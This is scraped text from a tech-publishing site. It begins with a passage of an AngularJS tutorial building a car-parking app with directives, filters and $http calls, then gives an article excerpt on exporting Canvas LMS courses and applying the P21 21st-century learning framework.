<!-- Importing the angular.js script --> <script src="angular.js"></script> <script> // Creating the module called parking var parking = angular.module("parking", []); // Registering the parkingCtrl to the parking module parking.controller("parkingCtrl", function ($scope) { // Binding the car’s array to the scope $scope.cars = [ {plate: '6MBV006'}, {plate: '5BBM299'}, {plate: '5AOJ230'} ]; // Binding the park function to the scope $scope.park = function (car) { $scope.cars.push(angular.copy(car)); delete $scope.car; }; }); </script> </head> <!-- Attaching the view to the parkingCtrl --> <body ng-controller="parkingCtrl"> <h3>[Packt] Parking</h3> <table> <thead> <tr> <th>Plate</th> </tr> </thead> <tbody> <!-- Iterating over the cars --> <tr ng-repeat="car in cars"> <!-- Showing the car’s plate --> <td>{{car.plate}}</td> </tr> </tbody> </table> <!-- Binding the car object, with plate, to the scope --> <input type="text" ng-model="car.plate"/> <!-- Binding the park function to the click event --> <button ng-click="park(car)">Park</button> </body> </html> The ngController, was used to bind the parkingCtrl to the view while the ngRepeat iterated over the car's array. Also, we employed expressions like {{car.plate}} to display the plate of the car. Finally, to add new cars, we applied the ngModel, which creates a new object called car with the plate property, passing it as a parameter of the park function, called through the ngClick directive. To improve the loading page performance, it is recommended to use the minified and obfuscated version of the script that can be identified by angular.min.js. Both minified and regular distributions of the framework can be found on the official site of AngularJS, that is, http://www.angularjs.org, or they can be directly referenced to Google Content Delivery Network (CDN). What is a directive? A directive is an extension of the HTML vocabulary that allows the creation of new behaviors. This technology lets the developers create reusable components that can be used within the whole application and even provide their own custom components. It may be applied as an attribute, element, class, and even as a comment, by using the camelCase syntax. However, because HTML is case-insensitive, we need to use a lowercase form. For the ngModel directive, we can use ng-model, ng:model, ng_model, data-ng-model, and x-ng-model in the HTML markup. Using AngularJS built-in directives By default, the framework brings a basic set of directives, such as iterate over an array, execute a custom behavior when an element is clicked, or even show a given element based on a conditional expression and many others. ngBind This directive is generally applied to a span element and replaces the content of the element with the result of the provided expression. It has the same meaning as that of the double curly markup, for example, {{expression}}. Why would anyone like to use this directive when a less verbose alternative is available? This is because when the page is being compiled, there is a moment when the raw state of the expressions is shown. Since the directive is defined by the attribute of the element, it is invisible to the user. Here is an example of the ngBind directive usage: index.html <!doctype html> <html ng-app="parking"> <head> <title>[Packt] Parking</title> <script src="angular.js"></script> <script> var parking = angular.module("parking", []); parking.controller("parkingCtrl", function ($scope) { $scope.appTitle = "[Packt] Parking"; }); </script> </head> <body ng-controller="parkingCtrl"> <h3 ng-bind="appTitle"></h3> </body> </html> ngRepeat The ngRepeat directive is really useful to iterate over arrays and objects. It can be used with any kind of element such as rows of a table, elements of a list, and even options of select. We must provide a special repeat expression that describes the array to iterate over and the variable that will hold each item in the iteration. The most basic expression format allows us to iterate over an array, attributing each element to a variable: variable in array In the following code, we will iterate over the cars array and assign each element to the car variable: index.html <!doctype html> <html ng-app="parking"> <head> <title>[Packt] Parking</title> <script src="angular.js"></script> <script> var parking = angular.module("parking", []); parking.controller("parkingCtrl", function ($scope) { $scope.appTitle = "[Packt] Parking"; $scope.cars = []; }); </script> </head> <body ng-controller="parkingCtrl"> <h3 ng-bind="appTitle"></h3> <table> <thead> <tr> <th>Plate</th> <th>Entrance</th> </tr> </thead> <tbody> <tr ng-repeat="car in cars"> <td><span ng-bind="car.plate"></span></td> <td><span ng-bind="car.entrance"></span></td> </tr> </tbody> </table> </body> </html> ngModel The ngModel directive attaches the element to a property in the scope, binding the view to the model. In this case, the element could be input (all types), select, or textarea. <input type="text" ng-model="car.plate" placeholder="What's the plate?" /> There is an important advice regarding the use of this directive. We must pay attention to the purpose of the field that is using the ngModel directive. Every time the field is being part of the construction of an object, we must declare in which object the property should be attached. In this case, the object that is being constructed is a car, so we use car.plate inside the directive expression. However, sometimes it might occur that there is an input field that is just used to change a flag, allowing the control of the state of a dialog or another UI component. In these cases, we may use the ngModel directive without any object, as far as it will not be used together with other properties or even persisted. ngClick and other event directives The ngClick directive is one of the most useful kinds of directives in the framework. It allows you to bind any custom behavior to the click event of the element. The following code is an example of the usage of the ngClick directive calling a function: index.html <!doctype html> <html ng-app="parking"> <head> <title>[Packt] Parking</title> <script src="angular.js"></script> <script> var parking = angular.module("parking", []); parking.controller("parkingCtrl", function ($scope) { $scope.appTitle = "[Packt] Parking"; $scope.cars = []; $scope.park = function (car) { car.entrance = new Date(); $scope.cars.push(car); delete $scope.car; }; }); </script> </head> <body ng-controller="parkingCtrl"> <h3 ng-bind="appTitle"></h3> <table> <thead> <tr> <th>Plate</th> <th>Entrance</th> </tr> </thead> <tbody> <tr ng-repeat="car in cars"> <td><span ng-bind="car.plate"></span></td> <td><span ng-bind="car.entrance"></span></td> </tr> </tbody> </table> <input type="text" ng-model="car.plate" placeholder="What's the plate?" /> <button ng-click="park(car)">Park</button> </body> </html> Here there is another pitfall. Inside the ngClick directive, we call the park function, passing the car as a parameter. As far as we have access to the scope through the controller, would not be easier if we just access it directly, without passing any parameter at all? Keep in mind that we must take care of the coupling level between the view and the controller. One way to keep it low is by avoid reading the scope object directly from the controller, replacing this intention by passing everything it need by parameter from the view. It will increase the controller testability and also make the things more clear and explicitly. Other directives that have the same behavior, but are triggered by other events, are ngBlur, ngChange, ngCopy, ngCut, ngDblClick, ngFocus, ngKeyPress, ngKeyDown, ngKeyUp, ngMousedown, ngMouseenter, ngMouseleave, ngMousemove, ngMouseover, ngMouseup, and ngPaste. Filters The filters are, associated with other technologies like directives and expressions, responsible for the extraordinary expressiveness of framework. It lets us easily manipulate and transform any value, not only combined with expressions inside a template, but also injected in other components like controllers and services. It is really useful when we need to format date and money according to our current locale or even support the filtering feature of a grid component. Filters are the perfect answer to easily perform any data manipulating. currency The currency filter is used to format a number based on a currency. The basic usage of this filter is without any parameter: {{ 10 | currency}} The result of the evaluation will be the number $10.00, formatted and prefixed with the dollar sign. In order to achieve the correct output, in this case R$10,00 instead of R$10.00, we need to configure the Brazilian (PT-BR) locale, available inside the AngularJS distribution package. There, we may find locales to the most part of the countries and we just need to import it to our application such as: <script src="js/lib/angular-locale_pt-br.js"></script> After import the locale, we will not need to use the currency symbol anymore because it's already wrapped inside. Besides the currency, the locale also defines the configuration of many other variables like the days of the week and months, very useful when combined with the next filter used to format dates. date The date filter is one of the most useful filters of the framework. Generally, a date value comes from the database or any other source in a raw and generic format. In this way, filters like that are essential to any kind of application. Basically, we can use this filter by declaring it inside any expression. In the following example, we use the filter on a date variable attached to the scope. {{ car.entrance | date }} The output will be Dec 10, 2013. However, there are thousands of combinations that we can make with the optional format mask. {{ car.entrance | date:'MMMM dd/MM/yyyy HH:mm:ss' }} Using this format, the output changes to December 10/12/2013 21:42:10. filter Have you ever needed to filter a list of data? This filter performs exactly this task, acting over an array and applying any filtering criteria. Now, let's include in our car parking application a field to search any parked car and use this filter to do the job. index.html <input type="text" ng-model="criteria" placeholder="What are you looking for?" /> <table> <thead> <tr> <th></th> <th>Plate</th> <th>Color</th> <th>Entrance</th> </tr> </thead> <tbody> <tr ng-class="{selected: car.selected}" ng-repeat="car in cars | filter:criteria" > <td> <input type="checkbox" ng-model="car.selected" /> </td> <td>{{car.plate}}</td> <td>{{car.color}}</td> <td>{{car.entrance | date:'dd/MM/yyyy hh:mm'}}</td> </tr> </tbody> </table> The result is really impressive. With an input field and the filter declaration we did the job. Integrating the backend with AJAX AJAX, also known as Asynchronous JavaScript and XML, is a technology that allows the applications to send and retrieve data from the server asynchronously, without refreshing the page. The $http service wraps the low-level interaction with the XMLHttpRequest object, providing an easy way to perform calls. This service could be called by just passing a configuration object, used to set many important information like the method, the URL of the requested resource, the data to be sent, and many others: $http({method: "GET", url: "/resource"}) .success(function (data, status, headers, config, statusText) { }) .error(function (data, status, headers, config, statusText) { }); To make it easier to use, there are the following shortcuts methods available for this service. In this case, the configuration object is optional. $http.get(url, [config]) $http.post(url, data, [config]) $http.put(url, data, [config]) $http.head(url, [config]) $http.delete(url, [config]) $http.jsonp(url, [config]) Now, it’s time to integrate our parking application with the back-end by calling the resource cars with the method GET. It will retrieve the cars, binding it to the $scope object. In case of something went wrong, we are going to log it to the console. controllers.js parking.controller("parkingCtrl", function ($scope, $http) { $scope.appTitle = "[Packt] Parking"; $scope.park = function (car) { car.entrance = new Date(); $scope.cars.push(car); delete $scope.car; }; var retrieveCars = function () { $http.get("/cars") .success(function(data, status, headers, config) { $scope.cars = data; }) .error(function(data, status, headers, config) { switch(status) { case 401: { $scope.message = "You must be authenticated!" break; } case 500: { $scope.message = "Something went wrong!"; break; } } console.log(data, status); }); }; retrieveCars(); }); Summary This article introduced you to the fundamentals of AngularJS in order to design and construct reusable, maintainable, and modular web applications. Resources for Article: Further resources on this subject: AngularJS Project [article] Working with Live Data and AngularJS [article] CreateJS – Performing Animation and Transforming Function [article]
Read more
  • 0
  • 0
  • 5002

article-image-now-youre-ready
Packt
20 Aug 2014
14 min read
Save for later

Now You're Ready!

Packt
20 Aug 2014
14 min read
In this article by Ryan John, author of the book Canvas LMS Course Design, we will have a look at the key points encountered during the course-building process, along with connections to educational philosophies and practices that support technology as a powerful way to enhance teaching and learning. (For more resources related to this topic, see here.) As you finish teaching your course, you will be well served to export your course to keep as a backup, to upload and reteach later within Canvas to a new group of students, or to import into another LMS. After covering how to export your course, we will tie everything we've learned together through a discussion of how Canvas can help you and your students achieve educational goals while acquiring important 21st century skills. Overall, we will cover the following topics: Exporting your course from Canvas to your computer Connecting Canvas to education in the 21st century Exporting your course Now that your course is complete, you will want to export the course from Canvas to your computer. When you export your course, Canvas compiles all the information from your course and allows you to download a single file to your computer. This file will contain all of the information for your course, and you can use this file as a master template for each time you or your colleagues teach the course. Exporting your course is helpful for two main reasons: It is wise to save a back-up version of your course on a computer. After all the hard work you have put into building and teaching your course, it is always a good decision to export your course and save it to a computer. If you are using a Free for Teachers account, your course will remain intact and accessible online until you choose to delete it. However, if you use Canvas through your institution, each institution has different procedures and policies in place regarding what happens to courses when they are complete. Exporting and saving your course will preserve your hard work and protect it from any accidental or unintended deletion. Once you have exported your course, you will be able to import your course into Canvas at any point in the future. You are also able to import your course into other LMSs such as Moodle or BlackBoard. You might wish to import your course back into Canvas if your course is removed from your institution-specific Canvas account upon completion. You will have a copy of the course to import for the next time you are scheduled to teach the same course. You might build and teach a course using a Free for Teachers account, and then later wish to import that version of the course into an institution-specific Canvas account or another LMS. Exporting your course does not remove the course from Canvas—your course will still be accessible on the Canvas site unless it is automatically deleted by your institution or if you choose to delete it. To export your entire course, complete the following steps: Click on the Settings tab at the bottom of the left-hand side menu, as pictured in the following screenshot: On the Settings page, look to the right-hand side menu. Click on the Export Course Content button, which is highlighted in the following screenshot: A screen will appear asking you whether you would like to export the Course or export a Quiz. To export your entire course, select the Course option and then click on Create Export, as shown in the following screenshot: Once you click on Create Export, a progress bar will appear. As indicated in the message below the progress bar, the export might take a while to complete, and you can leave the page while Canvas exports the content. The following screenshot displays this progress bar and message: When the export is complete, you will receive an e-mail from [email protected] that resembles the following screenshot. Click on the Click to view exports link in the e-mail: A new window or tab will appear in your browser that shows your Content Exports. Below the heading of the page, you will see your course export listed with a link that reads Click here to download, as pictured in the following screenshot. Go ahead and click on the link, and the course export file will be downloaded to your computer. Your course export file will be downloaded to your computer as a single .imscc file. You can then move the downloaded file to a folder on your computer's hard drive for later access. Your course export is complete, and you can save the exported file for later use. To access the content stored in the exported .imscc file, you will need to import the file back into Canvas or another LMS. You might notice an option to Conclude this Course on the course Settings page if your institution has not hidden or disabled this option. In most cases, it is not necessary to conclude your course if you have set the correct course start and end dates in your Course Details. Concluding your course prevents you from altering grades or accessing course content, and you cannot unconclude your course on your own. Some institutions conclude courses automatically, which is why it is always best to export your course to preserve your work. Now that we have covered the last how-to aspects of Canvas, let's close with some ways to apply the skills we have learned in this book to contemporary educational practices, philosophies, and requirements that you might encounter in your teaching. Connecting Canvas to education in the 21st century While learning how to use the features of Canvas, it is easy to forget the main purpose of Canvas' existence—to better serve your students and you in the process of education. In the midst of rapidly evolving technology, students and teachers alike require skills that are as adaptable and fluid as the technologies and new ideas swirling around them. While the development of various technologies might seem daunting, those involved in education in the 21st century have access to new and exciting tools that have never before existed. As an educator seeking to refine your craft, utilizing tools such as Canvas can help you and your students develop the skills that are becoming increasingly necessary to live and thrive in the 21st century. As attainment of these skills is indeed proving more and more valuable in recent years, many educational systems have begun to require evidence that instructors are cognizant of these skills and actively working to ensure that students are reaching valuable goals. Enacting the Framework for 21st Century Learning As education across the world continues to evolve through time, the development of frameworks, methods, and philosophies of teaching have shaped the world of formal education. In recent years, one such approach that has gained prominence in the United States' education systems is the Framework for 21st Century Learning, which was developed over the last decade through the work of the Partnership for 21st Century Skills (P21). This partnership between education, business, community, and government leaders was founded to help educators provide children in Kindergarten through 12th Grade (K-12) with the skills they would need going forward into the 21st century. Though the focus of P21 is on children in grades K-12, the concepts and knowledge articulated in the Framework for 21st Century Learning are valuable for learners at all levels, including those in higher education. In the following sections, we will apply our knowledge of Canvas to the desired 21st century student outcomes, as articulated in the P21 Framework for 21st Century Learning, to brainstorm the ways in which Canvas can help prepare your students for the future. Core subjects and 21st century themes The Framework for 21st Century Learning describes the importance of learning certain core subjects including English, reading or language arts, world languages, the arts, Mathematics, Economics, Science, Geography, History, Government, and Civics. In connecting these core subjects to the use of Canvas, the features of Canvas and the tips throughout this book should enable you to successfully teach courses in any of these subjects. In tandem with teaching and learning within the core subjects, P21 also advocates for schools to "promote understanding of academic content at much higher levels by weaving 21st century interdisciplinary themes into core subjects." The following examples offer insight and ideas for ways in which Canvas can help you integrate these interdisciplinary themes into your course. As you read through the following suggestions and ideas, think about strategies that you might be able to implement into your existing curriculum to enhance its effectiveness and help your students engage with the P21 skills: Global awareness: Since it is accessible from anywhere with an Internet connection, Canvas opens the opportunity for a myriad of interactions across the globe. Utilizing Canvas as the platform for a purely online course enables students from around the world to enroll in your course. As a distance-learning tool in colleges, universities, or continuing education departments, Canvas has the capacity to unite students from anywhere in the world to directly interact with one another: You might utilize the graded discussion feature for students to post a reflection about a class reading that considers their personal cultural background and how that affects their perception of the content. Taking it a step further, you might require students to post a reply comment on other students' reflections to further spark discussion, collaboration, and cross-cultural connections. As a reminder, it is always best to include an overview of online discussion etiquette somewhere within your course—you might consider adding a "Netiquette" section to your syllabus to maintain focus and a professional tone within these discussions. You might set up a conference through Canvas with an international colleague as a guest lecturer for a course in any subject. As a prerequisite assignment, you might ask students to prepare three questions to ask the guest lecturer to facilitate a real-time international discussion within your class. Financial, economic, business, and entrepreneurial literacy: As the world becomes increasingly digitized, accessing and incorporating current content from the Web is a great way to incorporate financial, economic, business, and entrepreneurial literacy into your course: In a Math course, you might consider creating a course module centered around the stock market. Within the module, you could build custom content pages offering direct instruction and introductions to specific topics. You could upload course readings and embed videos of interviews with experts with the YouTube app. You could link to live steam websites of the movement of the markets and create quizzes to assess students' understanding. Civic literacy: In fostering students' understanding of their role within their communities, Canvas can serve as a conduit of information regarding civic responsibilities, procedures, and actions: You might create a discussion assignment in which students search the Internet for a news article about a current event and post a reflection with connections to other content covered in the course. Offering guidance in your instructions to address how local and national citizenship impacts students' engagement with the event or incident could deepen the nature of responses you receive. Since discussion posts are visible to all participants in your course, a follow-up assignment might be for students to read one of the articles posted by another student and critique or respond to their reflection. Health literacy: Canvas can allow you to facilitate the exploration of health and wellness through the wide array of submission options for assignments. By utilizing the variety of assignment types you can create within Canvas, students are able to explore course content in new and meaningful ways: In a studio art class, you can create an out-of-class assignment to be submitted to Canvas in which students research the history, nature, and benefits of art therapy online and then create and upload a video sharing their personal relationship with art and connecting it to what they have found in the art therapy stories of others. Environmental literacy: As a cloud-based LMS, Canvas allows you to share files and course content with your students while maintaining and fostering an awareness of environmental sustainability: In any course you teach that involves readings uploaded to Canvas, encourage your students to download the readings to their computers or mobile devices rather than printing the content onto paper. Downloading documents to read on a device instead of printing them saves paper, reduces waste, and helps foster sustainable environmental habits. For PDF files embedded into content pages on Canvas, students can click on the preview icon that appears next to the document link and read the file directly on the content page without downloading or printing anything. Make a conscious effort to mention or address the environmental impacts of online learning versus traditional classroom settings, perhaps during a synchronous class conference or on a discussion board. Learning and innovation skills A number of specific elements combined can enable students to develop learning and innovation skills to prepare them for the increasingly "complex life and work environments in the 21st century." The communication setup of Canvas allows for quick and direct interactions while offering students the opportunity to contemplate and revise their contributions before posting to the course, submitting an assignment, or interacting with other students. This flexibility, combined with the ways in which you design your assignments, can help incorporate the following elements into your course to ensure the development of learning and innovation skills: Creativity and innovation: There are many ways in which the features of Canvas can help your students develop their creativity and innovation. As you build your course, finding ways for students to think creatively, work creatively with others, and implement innovations can guide the creation of your course assignments: You might consider assigning groups of students to assemble a content page within Canvas dedicated to a chosen or assigned topic. Do so by creating a content page, and then enable any user within the course to edit the page. Allowing students to experiment with the capabilities of the Rich Content Editor, embedding outside content and synthesizing ideas within Canvas allows each group's creativity to shine. As a follow-up assignment, you might choose to have students transfer the content of their content page to a public website or blog using sites such as Wikispaces, Wix, or Weebly. Once the sites are created, students can post their group site to a Canvas discussion page, where other students can view and interact with the work of their peers. Asking students to disseminate the class sites to friends or family around the globe could create international connections stemming from the creativity and innovation of your students' web content. Critical thinking and problem solving: As your students learn to overcome obstacles and find multiple solutions to complex problems, Canvas offers a place for students to work together to develop their critical thinking and problem-solving skills: Assign pairs of students to debate and posit solutions to a global issue that connects to topics within your course. Ask students to use the Conversations feature of Canvas to debate the issue privately, finding supporting evidence in various forms from around the Internet. Using the Collaborations feature, ask each pair of students to assemble and submit a final e-report on the topic, presenting the various solutions they came up with as well as supporting evidence in various electronic forms such as articles, videos, news clips, and websites. Communication and collaboration: With the seemingly impersonal nature of electronic communication, communication skills are incredibly important to maintain intended meanings across multiple means of communication. As the nature of online collaboration and communication poses challenges for understanding, connotation, and meaning, honing communication skills becomes increasingly important: As a follow-up assignment to the preceding debate suggestion, use the conferences tool in Canvas to set up a full class debate. During the debate, ask each pair of students to present their final e-report to the class, followed by a group discussion of each pair's findings, solutions, and conclusions. You might find it useful for each pair to explain their process and describe the challenges and/or benefits of collaborating and communicating via the Internet in contrast to collaborating and communicating in person.
Read more
  • 0
  • 0
  • 1104